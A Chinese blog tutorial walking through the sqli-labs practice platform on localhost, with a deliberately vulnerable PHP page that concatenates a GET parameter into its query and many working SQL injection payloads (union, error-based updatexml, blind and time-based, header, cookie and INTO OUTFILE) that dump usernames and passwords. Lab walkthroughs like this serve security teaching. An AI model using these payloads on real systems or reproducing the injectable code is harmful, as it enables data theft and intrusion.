第四章----web安全原理剖析（SQL注入）

布满荆棘的人生 2023-02-28 04:24 24阅读 0赞

### 目录 ###

*   *   *  1. SQL注入原理
         *  2. 必须知道的数据库常识
         *  3.通过sql-lab平台进行操作
         *   *  3.1 less-1 GET型 基于错误的单引号字符串
             *  ==对 基于错误的单引号注入 的解释==
             *  3.2 less-2 GET型 基于整数
             *  3.3 less-3 GET型 基于单引号加括号的字符型注入
             *  3.4 less-4 GET型 基于双引号加括号的字符型注入
             *  3.5 less-5 GET型 双注入 单引号字符串注入
             *  3.6 less-6 GET型 双引号 双引号字符串注入
             *  3.7 less-7 GET型 导入文件，字符型注入
             *  3.8 less-8 GET型 单引号盲注
             *  3.11 less-11 POST型 基于错误的单引号
             *  3.12 less-12 POST型 基于错误的双引号加括号的注入
             *  3.15 less-15 POST型 单引号盲注
             *  3.16 less-16 POST型 双引号+括号 盲注
             *  3.17 less-17 POST型 更新查询（报错注入）
             *  小插曲：firebox安装hack bar附加组件
             *  3.18 less-18 POST型 通过浏览器头部注入
             *  3.19 less-19 POST型 来源欺骗（报错注入）
             *  3.20 less-20 POST型 cookie 头部注入
             *  3.21 less-21 cookie加密
             *  3.22 less-22 cookie加密 双引号
             *  3.23 less-23 GET型 过滤字符
             *  3.24 less-24 GET型 （摸进你家门，装成你家人，然后做些坏事）
             *  3.25 less-25 过滤了 or 或 and
             *  3.26 less-26 过滤了 空格和注释
             *  3.27 less-27 过滤了 union 和 select
             *  3.28 less-28 过滤了 union 和 select大小写
             *  3.29 less-29 GET型 基于错误的不匹配，在web应用前有waf(类似防火墙)防护
             *  3.30 less-30 盲注 在web应用前有waf防护
             *  3.31 less-31 盲注，在web应用前有waf防护
             *  3.32 less-32 自定义过滤器 过滤危险字符，添加一个斜杠

### 1. SQL注入原理 ###

SQL注入就是前端将连接或者数据传递到后端，后端去进行处理，然后去数据库查询数据，最后返回给前端。

一般情况下，由数据库驱动的web应用程序 分3层：  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2lkX18zOQ_size_16_color_FFFFFF_t_70]  
sql 注入的方法：

*  报错注入
 *  盲注
 *  Union注入等

sql 注入漏洞的产生需要满足两个条件：

*  参数用户可控
 *  参数代入数据库查询

### 2. 必须知道的数据库常识 ###

（1）要注意三张表：

COLUMNS：存储该用户创建的所有数据库名称、表名称、字段名  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2lkX18zOQ_size_16_color_FFFFFF_t_70 1]  
SCHEMATA：存储该用户创建的所有数据库名称  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2lkX18zOQ_size_16_color_FFFFFF_t_70 2]  
TABLES：存储该用户创建的所有数据库名和表名称  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2lkX18zOQ_size_16_color_FFFFFF_t_70 3]  
（2）limit 的用法

limit m,n    #m是指记录开始的位置，从0开始表示第一条记录；n 指取n条数据

（3）需要记住的几个函数

*  database()：当前网站使用的数据库
 *  version()：当前Mysql的版本
 *  user()：当前MySQL的用户
 *  select group\_concat(schema\_name) from information\_schema.schemata：查看所有的数据库

（4）注释符

*  \# 注释符
 *  – 两个减号加一个空格（url中空格可以用+代替）
 *  /\*\*/

（5） 内联注释

形式为：/\*! code \*/  
可用于整个SQL，用来执行我们的SQL语句

（6）Union注入攻击

1----准备工作

在wamp安装目录下的www文件夹下，新建一个文件夹myinjection，然后新建一个union.php文件  
![在这里插入图片描述][20200720101918345.png]  
打开该文件，用PHP搭建一个东西

<?php
        header("Content-type:text/html;charset=utf-8");
        //创建数据库连接对象
        $con=mysqli_connect("localhost","root","","security");
        //判断是否连接失败
        if(mysqli_connect_errno()){
        
            echo "连接失败".mysqli_connect_errno();
        }
        //获取参数值
        $id=$_GET["id"];
        //拼接成一个sql 语句
        $sql1 = "select * from users where `id`=".$id;
        //输出这个sql语句，看看到底执行的是什么
        echo "<h1>指定的sql语句是：".$sql1."</h1>";
        //执行查询
        $result=mysqli_query($con,$sql1);
        //直接显示所有的结果
        while($row = mysqli_fetch_array($result)){
        
            echo $row['username']."|".$row['password'];
            echo "<br>";
        }
    ?>

正常查询：

浏览器访问网址：

*  http://127.0.0.1/myinjection/union.php?id=1  
    ![在这里插入图片描述][20200720101409990.png]
 *  http://127.0.0.1/myinjection/union.php?id=11000 or 1=1  
    ![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2lkX18zOQ_size_16_color_FFFFFF_t_70 4]  
    不正常查询：
 *  http://127.0.0.1/myinjection/union.php?id=1’ or 1=1  
    ![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2lkX18zOQ_size_16_color_FFFFFF_t_70 5]  
    我们可以根据报错注入：  
    加入order by num。num可以从1 到n尝试查询，最终辨别出当前使用的表有几列数据。  
    ![在这里插入图片描述][20200720103025482.png]  
    ![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2lkX18zOQ_size_16_color_FFFFFF_t_70 6]  
    由上可知，该表中一共有3列数据

2----执行Union查询

*  http://127.0.0.1/myinjection/union.php?id=1 union select 1,2,3  
    ![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2lkX18zOQ_size_16_color_FFFFFF_t_70 7]  
    显示出2|3，我们可以确定，显示到页面的是数据库的第二第三两列（因为上面我们通过order by可知，这个表一共三列）

可以逐步查询出当前使用的数据库名称，用户信息  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2lkX18zOQ_size_16_color_FFFFFF_t_70 8]  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2lkX18zOQ_size_16_color_FFFFFF_t_70 9]  
随便一个字符串，也可以  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2lkX18zOQ_size_16_color_FFFFFF_t_70 10]  
也可以输出多个信息  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2lkX18zOQ_size_16_color_FFFFFF_t_70 11]  
查询所有的数据库

*  http://127.0.0.1/myinjection/union.php?id=1 union select 1,2,group\_concat(schema\_name) from information\_schema.schemata  
    ![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2lkX18zOQ_size_16_color_FFFFFF_t_70 12]  
    查询表的数据
 *  http://127.0.0.1/myinjection/union.php?id=1 union select 1,2,group\_concat(table\_name) from information\_schema.tables where table\_schema=‘security’  
    ![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2lkX18zOQ_size_16_color_FFFFFF_t_70 13]  
    查询列信息
 *  http://127.0.0.1/myinjection/union.php?id=1 union select 1,2,group\_concat(column\_name) from information\_schema.columns where table\_schema=‘security’ and table\_name=‘users’  
    ![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2lkX18zOQ_size_16_color_FFFFFF_t_70 14]
 *  http://127.0.0.1/myinjection/union.php?id=1 union select 1,username,password from users  
    ![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2lkX18zOQ_size_16_color_FFFFFF_t_70 15]

### 3.通过sql-lab平台进行操作 ###

前提：开启wamp  
进入网址：127.0.0.1/sql

#### 3.1 less-1 GET型 基于错误的单引号字符串 ####

进入http://127.0.0.1/sql/Less-1/

1----正常访问：  
http://127.0.0.1/sql/Less-1/?id=1

2----添加 ’ 实现访问 http://127.0.0.1/sql/Less-1/?id=1’

提示：You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘‘1’’ LIMIT 0,1’ at line 1  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2lkX18zOQ_size_16_color_FFFFFF_t_70 16]  
3----通过order by 查看有多少列  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2lkX18zOQ_size_16_color_FFFFFF_t_70 17]  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2lkX18zOQ_size_16_color_FFFFFF_t_70 18]  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2lkX18zOQ_size_16_color_FFFFFF_t_70 19]  
可以在这个路径下，加一条语句，输入我们的SQL语句，便于理解  
![在这里插入图片描述][20200720144949523.png]  
![在这里插入图片描述][20200720145053422.png]

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2lkX18zOQ_size_16_color_FFFFFF_t_70 20]  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2lkX18zOQ_size_16_color_FFFFFF_t_70 21]  
4—通过union查询获取，显示出2、3列

*  http://127.0.0.1/sql/Less-1/?id=1’ union select 1,2,3 –  
    ![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2lkX18zOQ_size_16_color_FFFFFF_t_70 22]
 *  http://127.0.0.1/sql/Less-1/?id=-1’ union select 1,2,3 --+

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2lkX18zOQ_size_16_color_FFFFFF_t_70 23]

*  http://127.0.0.1/sql/Less-1/?id=-1 ’ union select 1,2,group\_concat(schema\_name) from information\_schema.schemata --+  
    ![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2lkX18zOQ_size_16_color_FFFFFF_t_70 24]  
    接下来的查询版本号还有数据库等，还有上面查到的一些都是相同原理。  
    5----查询具体数据
 *  http://127.0.0.1/sql/Less-1/?id=-1 ’ union select 1,username,password from users limit 1,1 --+  
    ![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2lkX18zOQ_size_16_color_FFFFFF_t_70 25]

#### 对 基于错误的单引号注入 的解释 ####

**----order by 篇**

先来看一下，后台的PHP代码是怎么进行SQL语句拼接的  
![在这里插入图片描述][20200720145858497.png]  
注意这里的id加了单引号，所以上面我们直接在后面加order by 后是都在单引号中的，所以我们表面上看order by 是不起效果的  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2lkX18zOQ_size_16_color_FFFFFF_t_70 26]  
所以我们需要在id=1后加一个单引号，进行单引号拼接  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2lkX18zOQ_size_16_color_FFFFFF_t_70 27]  
但是后面就多出了一个单引号，所以我们需要用\#注释掉  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2lkX18zOQ_size_16_color_FFFFFF_t_70 28]  
但是直接用\# 无法编译出来，所以可以用burp suit 编码，查一下\#的对应url的编码，就是%23  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2lkX18zOQ_size_16_color_FFFFFF_t_70 29]  
就可以看到后面的内容都被注释掉了，SQL语句就能正常运行啦  
或者用–+也可以进行注释  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2lkX18zOQ_size_16_color_FFFFFF_t_70 30]  
**----union篇**  
还是进入PHP文件，看到如下：  
![在这里插入图片描述][20200720153534134.png]  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2lkX18zOQ_size_16_color_FFFFFF_t_70 31]  
所以我我们用id=-1,获得的result为空，row为假，而提取第2,3列有内容，我们就能看到2,3列啦~

#### 3.2 less-2 GET型 基于整数 ####

如果是整型的一遍直接用数字拼接，见上面的我们自己写的PHP文件的测试，是相同的

拼接形式可以查询Less-2下的index.php文件  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2lkX18zOQ_size_16_color_FFFFFF_t_70 32]

#### 3.3 less-3 GET型 基于单引号加括号的字符型注入 ####

拼接形式：  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2lkX18zOQ_size_16_color_FFFFFF_t_70 33]  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2lkX18zOQ_size_16_color_FFFFFF_t_70 34]  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2lkX18zOQ_size_16_color_FFFFFF_t_70 35]  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2lkX18zOQ_size_16_color_FFFFFF_t_70 36]

#### 3.4 less-4 GET型 基于双引号加括号的字符型注入 ####

形式：  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2lkX18zOQ_size_16_color_FFFFFF_t_70 37]  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2lkX18zOQ_size_16_color_FFFFFF_t_70 38]  
也可以利用burp suite狙击手，添加载荷进行测试  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2lkX18zOQ_size_16_color_FFFFFF_t_70 39]  
可以发现有双引号的都会报错

#### 3.5 less-5 GET型 双注入 单引号字符串注入 ####

确定MySQL的一些知识点

1、使用MySQL的函数
    
    2、as 别称
      select 1 as a;
    
    3、rand：指定几位小数
    
    4、floor：向下取整
    
    5、ceiling：向上取整
    
    6、group by：分组，一般都结合聚合函数 count() sum() ...
    
    7、
    ---从左到右依次连接
    concat('符号',([真正的执行的sql语句]),'符号','其他内容')
      查询：select concat('~',(select database())) as spe_a;
      输出：~security 表头为spe_a
    ---把所有结果进行拼接
    select concat_ws('=',(select database()),(select rand())) as spe_a;

![在这里插入图片描述][20200720172424283.png]

![在这里插入图片描述][20200720172312502.png]  
![在这里插入图片描述][2020072017353563.png]  
less-5 注入类型判断  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2lkX18zOQ_size_16_color_FFFFFF_t_70 40]  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2lkX18zOQ_size_16_color_FFFFFF_t_70 41]  
上面报错了，可以猜出闭合符号为 ’ 单引号。  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2lkX18zOQ_size_16_color_FFFFFF_t_70 42]  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2lkX18zOQ_size_16_color_FFFFFF_t_70 43]  
通过上面我们能猜出，有3列数据  
![在这里插入图片描述][20200721103246816.png]  
访问：

> \-http://127.0.0.1/sql/Less-5/?id=1’ union all select count(\*),2,concat(’~’,(select schema\_name from information\_schema.schemata limit 4,1),’~’,floor(rand()\*2)) as spe\_a from information\_schema.schemata group by spe\_a --+

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2lkX18zOQ_size_16_color_FFFFFF_t_70 44]  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2lkX18zOQ_size_16_color_FFFFFF_t_70 45]  
![在这里插入图片描述][20200721104051966.png]  
能否提取到数据取决于随机数

获取user表：

> http://127.0.0.1/sql/Less-5/?id=-1’ union all select count(\*),2,concat(’~’,(select schema\_name from information\_schema.tables where table\_schema=‘security’ limit 3,1),’~’,floor(rand()\*2)) as spe\_a from information\_schema.schemata agroup by spe\_a --+

获取账号 密码：

> http://127.0.0.1/sql/Less-5/?id=-1’ union all select count(\*),1,concat( ‘~’,(select concat(id,username,password) from users limit 0,1),’~’,floor(rand()\*2)) as spe\_a from information\_schema.schemata group by spe\_a --+

#### 3.6 less-6 GET型 双引号 双引号字符串注入 ####

直接查看对应目录下的php文件的sql语句，而且我们知道目前的列数都是3列  
与less-5相同，修改一下闭合符号

获取账号密码：

> http://127.0.0.1/sql/Less-6/?id=-1" union all select count(\*),1,concat\_ws( ‘~’,(select concat\_ws(’,’,id,username,password) from users limit 1,1),’~’,floor(rand()\*2)) as spe\_a from information\_schema.schemata group by spe\_a --+

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2lkX18zOQ_size_16_color_FFFFFF_t_70 46]

#### 3.7 less-7 GET型 导入文件，字符型注入 ####

尝试写数据到F盘：

> http://127.0.0.1/sql/Less-7/?id=-1’)) union select 1,2,3 into outfile “f://test.txt” --+

![在这里插入图片描述][20200721111630163.png]  
写入其他数据到文件：

> http://127.0.0.1/sql/Less-7/?id=-1’)) union select 1,2,<?php echo 123; ?> into outfile “f://test2.txt” –

#### 3.8 less-8 GET型 单引号盲注 ####

查看php文件，闭合符号为单引号  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2lkX18zOQ_size_16_color_FFFFFF_t_70 47]  
使用盲注，一般是没有什么返回信息。但是整体的套路依旧是遵循先获取库，再获取表，再获取字段，然后获取信息。

如：判断数据库，就是先判断数据库的长度，然后一个字母一个字母的去猜测。  
如security。长度从第一个开始猜测，猜到8个长度判断成功。然后就是取出一个字符，用a-z去做等于判断，最终确定第一个字母，然后取第二个字母，再用a-z做等于判断，以此类推，最终确定数据库。

会用到一些数据库相关的函数，如：

*  length(database())：得到数据库长度
 *  substr(str,position,len)：从str的第position开始截取len个字符并返回，position的值从1开始
 *  ascii(str)：返回str的ascii码

用burp suite进行测试：  
1----查看数据库长度：

> http://127.0.0.1/sql/Less-8/?id=1’ and length(database())= 8 --+  
> 可以看出长度为8  
> ![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2lkX18zOQ_size_16_color_FFFFFF_t_70 48]  
> 2----然后逐步攻击出数据库的名称字母组成  
> 127.0.0.1/sql/Less-8/?id=1’ and substr(database(),1,1)=“s” --+

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2lkX18zOQ_size_16_color_FFFFFF_t_70 49]  
3—判断表  
3.1—判断表的个数

> http://127.0.0.1/sql/Less-8/?id=1’ and (select count(\*) from information\_schema.tables where table\_schema=database())=4 --+

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2lkX18zOQ_size_16_color_FFFFFF_t_70 50]  
3.2—判断第4张表的字母组成

> http://127.0.0.1/sql/Less-8/?id=1’ and (substr((select table\_name from information\_schema.tables where table\_schema=database() limit 3,1),1,1))=“u”–+

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2lkX18zOQ_size_16_color_FFFFFF_t_70 51]

#### 3.11 less-11 POST型 基于错误的单引号 ####

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2lkX18zOQ_size_16_color_FFFFFF_t_70 52]  
直接绕密码，猜用户名来登录：  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2lkX18zOQ_size_16_color_FFFFFF_t_70 53]  
查看一共多少列  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2lkX18zOQ_size_16_color_FFFFFF_t_70 54]  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2lkX18zOQ_size_16_color_FFFFFF_t_70 55]  
一共显示两列

获取数据库：  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2lkX18zOQ_size_16_color_FFFFFF_t_70 56]  
获取数据库中的表：

> \-1’ union select 1,group\_concat(table\_name) from information\_schema.tables where table\_schema=‘security’ \#

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2lkX18zOQ_size_16_color_FFFFFF_t_70 57]  
获取数据字段：

> \-1’ union select 1,group\_concat(column\_name) from information\_schema.columns where table\_schema=‘security’ and table\_name=‘users’ \#

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2lkX18zOQ_size_16_color_FFFFFF_t_70 58]  
获取数据：

> \-1’ union select 1,group\_concat(username,password) from users \#

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2lkX18zOQ_size_16_color_FFFFFF_t_70 59]

#### 3.12 less-12 POST型 基于错误的双引号加括号的注入 ####

查看 Less-12 php文件SQL拼接如下：  
![在这里插入图片描述][20200722101929243.png]  
用用户名尝试：  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2lkX18zOQ_size_16_color_FFFFFF_t_70 60]  
其他的同上，只需要修改闭合符号即可。

#### 3.15 less-15 POST型 单引号盲注 ####

> admin’ and length(database())=8 \#

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2lkX18zOQ_size_16_color_FFFFFF_t_70 61]

#### 3.16 less-16 POST型 双引号+括号 盲注 ####

mysql语句 if(a,b,c)：如果a条件成立，执行b，否则执行c。

> 时间盲注：  
> admin’ and if(length(database())=8,sleep(5),1) \#  
> 如果判断成功，执行睡5秒，再进入

#### 3.17 less-17 POST型 更新查询（报错注入） ####

先查看一下源码：  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2lkX18zOQ_size_16_color_FFFFFF_t_70 62]  
![在这里插入图片描述][20200722111132285.png]  
![在这里插入图片描述][20200722111228761.png]  
更新语句：  
![在这里插入图片描述][20200722111317748.png]  
通过密码框进行注入，需要用到以下函数：

*  updatexml(xmlDocument,xpath-string,new-value)

查询版本号：

> 用户名框：admin1  
> 密码框：1’ and updatexml(1,concat("~",(select version()),"~"),1) \#

> 语法：  
> 1’ and updatexml(1,sql语句,"~"),1) \#

> 查询出表：1’ and updatexml(1,concat(’~’,(select group\_concat(table\_name) from information\_schema.tables where table\_schema=‘security’),’~’),1) \#

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2lkX18zOQ_size_16_color_FFFFFF_t_70 63]

#### 小插曲：firebox安装hack bar附加组件 ####

1----先关闭代理  
2----添加附加组件  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2lkX18zOQ_size_16_color_FFFFFF_t_70 64]  
3----安装好后打开代理  
这里安装的是hackbar2，是免费的。  
4----按F12  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2lkX18zOQ_size_16_color_FFFFFF_t_70 65]

#### 3.18 less-18 POST型 通过浏览器头部注入 ####

查看PHP源码：  
![在这里插入图片描述][20200722144522510.png]  
账号和密码都进行了长度限制

成功登录，输出浏览器信息并存到数据库  
![在这里插入图片描述][20200722144923785.png]  
头部注入操作：

> 结构：  
> ’ and updatexml(1,sql语句,1) and ‘1’=‘1  
> 实操语句：  
> ’ and updatexml(1,concat(’~’,select version(),’~’),1) and ‘1’='1  
> ![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2lkX18zOQ_size_16_color_FFFFFF_t_70 66]  
> 输出了版本信息，说明能够进行sql注入

#### 3.19 less-19 POST型 来源欺骗（报错注入） ####

> 实操语句：  
> ’ and updatexml(1,concat(’~’,(select database()),’~’),1) and ‘1’='1

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2lkX18zOQ_size_16_color_FFFFFF_t_70 67]

#### 3.20 less-20 POST型 cookie 头部注入 ####

> 实操语句：  
> ’ and updatexml(1,concat(’~’,(select database()),’~’),1) and ‘1’='1

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2lkX18zOQ_size_16_color_FFFFFF_t_70 68]

#### 3.21 less-21 cookie加密 ####

查看源码，发现进行了cookie加密  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2lkX18zOQ_size_16_color_FFFFFF_t_70 69]

查看编码  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2lkX18zOQ_size_16_color_FFFFFF_t_70 70]  
再用编码器解码  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2lkX18zOQ_size_16_color_FFFFFF_t_70 71]  
注入语句：

> admin’ and updatexml(1,concat(’~’,(select database()),’~’),1) and ‘1’='1

进入编码器，编码  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2lkX18zOQ_size_16_color_FFFFFF_t_70 72]  
放在cookie后面：  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2lkX18zOQ_size_16_color_FFFFFF_t_70 73]

#### 3.22 less-22 cookie加密 双引号 ####

除了闭合符号不同，其他同21

#### 3.23 less-23 GET型 过滤字符 ####

查看PHP源码文件，发现做了正则替换，剔除了我们输入的\#，–符号  
![在这里插入图片描述][20200722163026948.png]  
不能注释，我们还能想办法把语句闭合掉。

> xxx = ’ ’  
> 变成：  
> xxx = ‘1’ or ‘1’ = '1  
> 将 ‘1’ =‘1 形式加入到其他语句中  
> union：  
> \-1’ union all select 1,(select group\_concat(table\_name) from information\_schema.tables where table\_schema=database()),'3

